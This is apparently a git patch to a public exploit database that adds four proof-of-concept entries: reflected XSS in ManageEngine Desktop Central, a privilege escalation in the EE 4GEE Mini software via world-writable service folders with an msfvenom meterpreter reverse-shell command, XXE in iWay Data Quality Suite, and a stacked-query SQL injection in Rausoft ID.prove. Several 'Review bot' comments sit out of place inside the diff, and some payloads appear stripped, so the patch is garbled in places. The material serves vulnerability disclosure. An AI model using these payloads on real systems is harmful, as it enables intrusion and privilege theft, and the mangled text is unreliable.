From 91ac09507e141d21cea6c54291412f15c311da6a Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 28 Sep 2018 05:01:59 +0000
Subject: [PATCH] DB: 2018-09-28

4 changes to exploits/shellcodes

EE 4GEE Mini EE40_00_02.00_44 - Privilege Escalation
iWay Data Quality Suite Web Console 10.6.1.ga - XML External Entity Injection
ManageEngine Desktop Central 10.0.271 - Cross-Site Scripting
Rausoft ID.prove 2.95 - 'Username' SQL injection

Linux/x86 - Bind (5555/TCP) Shell Shellcode (98 bytes)
Linux/x86 - Bind (5555/TCP) Shell (/bin/sh) Shellcode (98 bytes)
---
 exploits/java/webapps/45499.txt | 31 ++++++++++
 exploits/windows/local/45501.txt | 73 +++++++++++++++++++++++
 exploits/windows/webapps/45498.txt | 42 +++++++++++++
 exploits/windows_x86-64/webapps/45500.txt | 20 +++++++
 files_exploits.csv | 4 ++
 files_shellcodes.csv | 2 +-
 6 files changed, 171 insertions(+), 1 deletion(-)
 create mode 100644 exploits/java/webapps/45499.txt
 create mode 100644 exploits/windows/local/45501.txt
 create mode 100644 exploits/windows/webapps/45498.txt
 create mode 100644 exploits/windows_x86-64/webapps/45500.txt

diff --git a/exploits/java/webapps/45499.txt b/exploits/java/webapps/45499.txt
new file mode 100644
index 000000000..779465e47
--- /dev/null
+++ b/exploits/java/webapps/45499.txt
@@ -0,0 +1,31 @@
+# Exploit Title: ManageEngine Desktop Central 10.0.271 - Cross-Site Scripting
+# Date: 2018-09-11
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.manageengine.com/
+# Hardware Link : https://www.manageengine.com/products/desktop-central/
+# Software : ZOHO Corp ManageEngine Desktop Central 10
+# Product Version: 10.0.271
+# Vulernability Type : Cross-site Scripting
+# Vulenrability : Reflected
+# CVE : CVE-2018-16833
+
+# Zoho ManageEngine Desktop Central 10.0.271 has XSS via the "Features & Articles"
+# search field to the /advsearch.do?SUBREQUEST=XMLHTTP URI.
+
+# HTTP Request Header :
+
+POST /advsearch.do?SUBREQUEST=XMLHTTP HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
+Accept: */*
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://TARGET/homePage.do?actionToCall=homePageDetails
+X-Requested-With: XMLHttpRequest
+Content-type: application/x-www-form-urlencoded;charset=UTF-8
+X-ZCSRF-TOKEN: =All
+Content-Length: 222
+Cookie: DCJSESSIONID=34B31AEA87E0A617AB23A607C980CC07; DCJSESSIONIDSSO=0738458E311E15CD1E28F27F1DED5388; dc_customerid=All; summarypage=true; DM_SPDA_LST=1536665909495
+Connection: close
+
+q=">&src=sall&stab=Home&page=1&pagelimit=10&searchParamId=901&searchParamName=dm.advsearch.features.articles&id=1536666162979&isTriggerFromMenu=false&actionToCall=getSearchResults
\ No newline at end of file
diff --git a/exploits/windows/local/45501.txt b/exploits/windows/local/45501.txt
new file mode 100644
index 000000000..e1aca9ca6
--- /dev/null
+++ b/exploits/windows/local/45501.txt
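Review bot: The PoC body ends with `q=">` — an attribute-breakout prefix with no script payload and no response excerpt showing where `q` is reflected — so the XSS cannot be verified or reproduced from this entry. The visible body is roughly 179 bytes while the request declares `Content-Length: 222`, so part of the payload appears to have been lost (presumably a tag stripped on the way in); the actual submitted string and the reflection context should be restored, e.g. a line `# Reflected unencoded inside the search-results HTML returned by getSearchResults`. Worth a caveat as well: the request is an XMLHttpRequest POST carrying `X-Requested-With`, an `X-ZCSRF-TOKEN` header and session cookies, and if the endpoint enforces those a victim cannot be made to send it cross-site; the "Reflected" classification should state whether the parameter is also reflected on a plain GET or POST without them.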
@@ -0,0 +1,73 @@
+# Title: EE 4GEE Mini EE40_00_02.00_44 - Privilege Escalation
+# Date: 2018-09-22
+# Software Version: EE40_00_02.00_44
+# Tested on: Windows 10 64-bit and Windows 7 64-bit
+# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)
+# Original Advisory: http://blog.zerodaylab.com/2018/09/zerodaylab-discovers-ee-unquoted.html
+# Original Write-up: https://osandamalith.com/2018/09/17/ee-4gee-mini-local-privilege-escalation-vulnerability-cve-2018-14327/
+# CVE: CVE-2018-14327
+# References
+# https://www.theregister.co.uk/2018/09/19/ee_modem_vuln/
+# https://thehackernews.com/2018/09/4g-ee-wifi-modem-hack.html
+
+# PoC
+
+C:\>sc qc "Alcatel OSPREY3_MINI Modem Device Helper"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: Alcatel OSPREY3_MINI Modem Device Helper
+ TYPE : 110 WIN32_OWN_PROCESS (interactive)
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\Web Connecton\EE40\BackgroundService\ServiceManager.exe -start
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Alcatel OSPREY3_MINI Modem Device Helper
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+
+# Weak Folder Permissions
+
+C:\Program Files (x86)\Web Connecton>icacls EE40
+EE40 Everyone:(OI)(CI)(F)
+ NT SERVICE\TrustedInstaller:(I)(F)
+ NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
+ NT AUTHORITY\SYSTEM:(I)(F)
+ NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
+ BUILTIN\Administrators:(I)(F)
+ BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
+ BUILTIN\Users:(I)(RX)
+ BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
+ CREATOR OWNER:(I)(OI)(CI)(IO)(F)
+ APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
+ APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
+ APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
+ APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
+
+Successfully processed 1 files; Failed processing 0 files
+
+C:\Program Files (x86)\Web Connecton>
+C:\Program Files (x86)\Web Connecton>
+C:\Program Files (x86)\Web Connecton>icacls EE40\BackgroundService
+EE40\BackgroundService Everyone:(OI)(CI)(F)
+ Everyone:(I)(OI)(CI)(F)
+ NT SERVICE\TrustedInstaller:(I)(F)
+ NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
+ NT AUTHORITY\SYSTEM:(I)(F)
+ NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
+ BUILTIN\Administrators:(I)(F)
+ BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
+ BUILTIN\Users:(I)(RX)
+ BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
+ CREATOR OWNER:(I)(OI)(CI)(IO)(F)
+ APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
+ APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
+ APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
+ APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
+
+Successfully processed 1 files; Failed processing 0 files
+
+# Example Payload
+
+msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.4 lport=443 -f exe -o rev_shell.exe
\ No newline at end of file
diff --git a/exploits/windows/webapps/45498.txt b/exploits/windows/webapps/45498.txt
new file mode 100644
index 000000000..657214a08
--- /dev/null
+++ b/exploits/windows/webapps/45498.txt
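Review bot: The PoC stops at generating `rev_shell.exe` and never states the step that actually elevates privilege. The evidence shown supports it — `EE40\BackgroundService` carries `Everyone:(OI)(CI)(F)`, and `sc qc` shows the service running `ServiceManager.exe` from that directory as `LocalSystem` with `AUTO_START` — so the entry should say explicitly that the payload is written over `C:\Program Files (x86)\Web Connecton\EE40\BackgroundService\ServiceManager.exe` (or whatever the write-up actually did) and that it executes on the next service start, which for a standard user normally means a reboot unless `sc sdshow` shows the user holds start/stop rights on the service. The `BINARY_PATH_NAME` is also unquoted and contains spaces, which the linked advisory title alludes to, but the directories that vector would need are not shown here, so the entry should be clear that the demonstrated vector is the world-writable folder. A line marking `lhost=192.168.0.4` as a placeholder to be replaced would also help.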
@@ -0,0 +1,42 @@ +# Exploit Title: iWay Data Quality Suite Web Console 10.6.1.ga-2016-11-20 – XML External Entity Injection +# Google Dork: N/A +# Date: 2018-09-27 +# Exploit Author: Sureshbabu Narvaneni# +# Author Blog : https://nullnews.in +# Vendor Homepage: www.informationbuilders.co.uk +# Software Link: http://www.informationbuilders.co.uk/products/integrity/dqsuite +# Affected Version: 10.6.1.ga +# Category: WebApps +# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686 +# CVE : N/A + +# Technical Description: +# iWay Data Quality Suite Web Console provides web services features. As there is no +# validation present on the web services featured by product while processing +# the user input an attacker can easily inject external entities in the SOAP request and can +# achieve the successful Remote Code Execution on the server + +# Proof Of Concept: + +> Access the iWay DQS Web Console application section. +> Create an entry for web service and form a sample SOAP request. +> Send below crafted request to the server to confirm the vulnerability + + +]> + + + + +&xxe; + + + + +> The below log shows that the web service component is vulnerable to XXE. + +root@MrR3boot:/var/www/html# tail -f /var/log/apache2/access.log +1xx.xx.xxx.xx - - [25/Sep/2018:01:13:42 -0400] "GET /xxetest HTTP/1.0" 404 +474 "-" "-" \ No newline at end of file diff --git a/exploits/windows_x86-64/webapps/45500.txt b/exploits/windows_x86-64/webapps/45500.txt new file mode 100644 index 000000000..bdb4386f6 --- /dev/null +++ b/exploits/windows_x86-64/webapps/45500.txt 
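Review bot: The Technical Description claims the attacker "can achieve the successful Remote Code Execution on the server", but the only evidence in the PoC is an out-of-band `GET /xxetest` arriving at the author's Apache server, which demonstrates that external entities are resolved (out-of-band XXE / SSRF), not code execution; the claim should be scaled back to what is shown, e.g. `# ... an attacker can inject external entities into the SOAP request, giving out-of-band interaction and file/URL access (RCE not demonstrated).` The SOAP request itself survives in this entry only as `]>` and `&xxe;` — the DOCTYPE/ENTITY declaration and the envelope appear to have been stripped as markup — so the payload needs to be re-added in a form that survives rendering for the PoC to be reproducible. The line `Exploit Author: Sureshbabu Narvaneni#` also carries a stray trailing `#`.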
@@ -0,0 +1,20 @@
+# Exploit Title: Rausoft ID.prove 2.95 - 'Username' SQL injection
+# Google Dork: inurl:IdproveWebclient
+# Date: 2018-09-26
+# Exploit Author: Ilya Timchenko, Mercedes pay S.A.
+# Vendor Homepage: https://www.idprove.de
+# Software Link: https://www.idprove.de/english/index.php?option=com_content&view=article&id=17&Itemid=3
+# Version: 2.95
+# Tested on: Windows 2016
+# CVE : N/A
+# Description: An issue was discovered in Rausoft ID.prove 2.95. The login page with a field "Username"
+# https://<>/IdproveWebclient/Account/Login?ReturnUrl=%2fIdproveWebclient%2fEinzelsuche --data="__RequestVerificationToken=<>&Username=a&PasswordTemp=a"
+# is vulnerable to the SQL injection via Microsoft SQL Server stacked queries in the Username POST parameter.
+# Hypothetically, an attacker can utilize master..xp_cmdshell for the further privilege elevation.
+
+# SQLmap output:
+# Parameter: #1* ((custom) POST)
+# Type: stacked queries
+# Title: Microsoft SQL Server/Sybase stacked queries (comment)
+
+Payload: __RequestVerificationToken=<>&Username=a';WAITFOR DELAY '0:0:5'--&PasswordTemp=a
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index b84dff0c7..93340d5b0 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
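Review bot: The sentence `Hypothetically, an attacker can utilize master..xp_cmdshell for the further privilege elevation.` is speculation the PoC does not support: the evidence is a time-based stacked query (`WAITFOR DELAY '0:0:5'`), while xp_cmdshell additionally requires the application's SQL login to hold sysadmin (or equivalent) and the procedure to be enabled, neither of which is shown. Suggest rewording to `# If the application's database login is sysadmin, stacked queries would also allow enabling and calling xp_cmdshell (not verified).` It would also help readers to note that `__RequestVerificationToken=<>` is an anti-forgery token that must be fetched from the login page (together with its cookie) before each request, which appears to be why the injection was run as a sqlmap custom (`#1*`) parameter.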
@@ -10004,6 +10004,7 @@ id,file,description,date,author,type,platform,port
 45479,exploits/solaris/local/45479.rb,"Solaris - 'EXTREMEPARR' dtappgather Privilege Escalation (Metasploit)",2018-09-25,Metasploit,local,solaris,
 45492,exploits/windows_x86/local/45492.py,"Faleemi Desktop Software 1.8.2 - 'Device alias' Local Buffer Overflow (SEH)",2018-09-25,"Gionathan Reale",local,windows_x86,
 45497,exploits/linux/local/45497.txt,"Linux - VMA Use-After-Free via Buggy vmacache_flush_all() Fastpath",2018-09-26,"Google Security Research",local,linux,
+45501,exploits/windows/local/45501.txt,"EE 4GEE Mini EE40_00_02.00_44 - Privilege Escalation",2018-09-27,"Osanda Malith Jayathissa",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -40038,3 +40039,6 @@ id,file,description,date,author,type,platform,port
 45487,exploits/hardware/webapps/45487.txt,"RICOH MP 305+ Printer - Cross-Site Scripting",2018-09-25,"Ismail Tasdelen",webapps,hardware,
 45490,exploits/hardware/webapps/45490.txt,"RICOH MP C406Z Printer - Cross-Site Scripting",2018-09-25,"Ismail Tasdelen",webapps,hardware,
 45491,exploits/php/webapps/45491.txt,"Joomla! Component Responsive Portfolio 1.6.1 - 'filter_order_Dir' SQL Injection",2018-09-25,AkkuS,webapps,php,
+45498,exploits/windows/webapps/45498.txt,"iWay Data Quality Suite Web Console 10.6.1.ga - XML External Entity Injection",2018-09-27,"Sureshbabu Narvaneni",webapps,windows,
+45499,exploits/java/webapps/45499.txt,"ManageEngine Desktop Central 10.0.271 - Cross-Site Scripting",2018-09-27,"Ismail Tasdelen",webapps,java,
+45500,exploits/windows_x86-64/webapps/45500.txt,"Rausoft ID.prove 2.95 - 'Username' SQL injection",2018-09-27,"Ilya Timchenko",webapps,windows_x86-64,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 83e9cfe70..083fd7f4a 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -887,7 +887,7 @@ id,file,description,date,author,type,platform
 44723,shellcodes/linux_x86/44723.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (113 bytes)",2018-05-23,"Matteo Malvica",shellcode,linux_x86
 44738,shellcodes/linux_x86/44738.c,"Linux/x86 - Reverse (10.10.2.4:4444/TCP) Shell Shellcode (68 bytes)",2018-05-24,"Nuno Freitas",shellcode,linux_x86
 44740,shellcodes/linux_x86/44740.c,"Linux/x86 - Reverse (10.0.7.17:4444/TCP) Shell (/bin/sh) Shellcode (101 Bytes)",2018-05-24,"Jonathan Crosby",shellcode,linux_x86
-44791,shellcodes/linux_x86/44791.c,"Linux/x86 - Bind (5555/TCP) Shell Shellcode (98 bytes)",2018-05-28,Luca,shellcode,linux_x86
+44791,shellcodes/linux_x86/44791.c,"Linux/x86 - Bind (5555/TCP) Shell (/bin/sh) Shellcode (98 bytes)",2018-05-28,Luca,shellcode,linux_x86
 44807,shellcodes/linux_x86/44807.c,"Linux/x86 - Egghunter (0xdeadbeef) + access() + execve(/bin/sh) Shellcode (38 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
 44808,shellcodes/linux_x86/44808.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (105 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
 44811,shellcodes/arm/44811.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (32 bytes)",2018-05-31,"Ken Kitahara",shellcode,arm